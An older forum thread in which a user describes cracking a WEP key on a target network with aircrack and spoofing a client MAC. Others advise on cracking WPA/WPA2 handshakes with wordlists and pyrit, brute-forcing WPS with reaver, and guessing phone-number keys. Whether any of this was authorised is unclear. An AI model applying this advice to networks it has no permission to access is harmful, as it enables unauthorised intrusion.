WEP Cracking - Starting with the easy stuff

[Abe_L_2012]

I figure hacking skills will be a very useful skillset to have in some shit hits the fans scenarios. So I am starting with the easy stuff, cracking wifi. That's a good place to start, no? I am open to suggestions.

The first time I cracked it totally passively, just collecting millions of #s. The second time I followed the WEP cracking wiki for aircrack. I ended up with success on a target both time, with the same hex key as a result.



I verified the key VIA airdecap



I tried connecting, using Wicd using both 35:72:07:D1:9B:D5:FA:C8:01:FB:C7:2B:7C

357207D19BD5FAC801FBC72B7C

in the password, in all the WEP modes it has. All came back with bad password for some reason. I was also spoofing a client MAC, so not sure what went wrong. How do I figure out what is going wrong, what is the next step?

Also, with all the decrypted packets I have, is there any way to try and reconstruct or something?

[Kulverstukas]

Next step is to figure a way to crack WPA, and after that - WPA2.

[Abe_L_2012]

I mean the next step in troubleshooting the WEP I am working on. Or am I better off just forgetting about it and moving on? Maybe I am, not a whole lot of people use WEP these days 

[Axon]

A stupid question.

Do you need a wordlist in any type of password cracking (Zip password,WEP password, etc.)?

[Kulverstukas]

You don't for WEP, but for WPA/WPA2 you kinda need to.

[Praxis]

How close are you to the AP? If you're not close enough, a lot of the time it will tell you that it's a "bad password", even if you do in fact have the correct password.

Do you need a wordlist in any type of password cracking (Zip password,WEP password, etc.)?

You don't need a wordlist to crack WEP. As mentioned before, you DO need one when cracking either WPA or WPA2. If your wordlist doesn't contain the password, you won't be able to crack the key so it's important that you use a good wordlist.

Next step is to figure a way to crack WPA, and after that - WPA2.

Am I wrong in thinking that both WPA and WPA2 both use the same method of cracking, by grabbing the three-way-handshake and running it against a wordlist?

[Axon]

You don't need a wordlist to crack WEP. As mentioned before, you DO need one when cracking either WPA or WPA2. If your wordlist doesn't contain the password, you won't be able to crack the key so it's important that you use a good wordlist.

aha ... so not every wordlist is suitable for cracking WPA/WPA2? damn 

[Praxis]

aha ... so not every wordlist is suitable for cracking WPA/WPA2? damn 

Nope! There are some huge wordlists online though, they're your best bet. Also be sure to add some of the "common" passwords into the wordlist for best effect, like "password" or "123456" - you get the idea.

There are also online WPA/WPA2 cracking services, and some hacking forums even have threads where you can post handshakes and people will try and crack them

[techb]

When I worked tech support for a DSL ISP, we had the customers use their 10 digit phone number as the password if they used WEP. You could brute force it if they are using a telephone number. The area code and first 3 digits wouldn't be hard to guess, and the only real vrute forcing would go for the last 4 digits of the phone number.


Just food for thought.

[palipr]

For WPA/WPA2 word lists are useful and are often the only way to go, considering the only alternative is brute forcing. For both of them I use pyrit to help the process along much quicker than just a CPU.


The wordlist(s) I use are from g0tmi1k: [size=78%]http://g0tmi1k.blogspot.com/2011/06/dictionaries-wordlists.html[/size]


(Using pryrit with a Geforce 460 GTX I can go through the 18-in-1 word list in approximately 6 hours)


But recently I have been using reaver to brute force the WPS part of a router to obtain the WPA keyphrase. Its not very fast either but guaranteed to work as long as you give it enough time to do its thing.


Hope this is a helpful start for when you move onto WPA/WPA2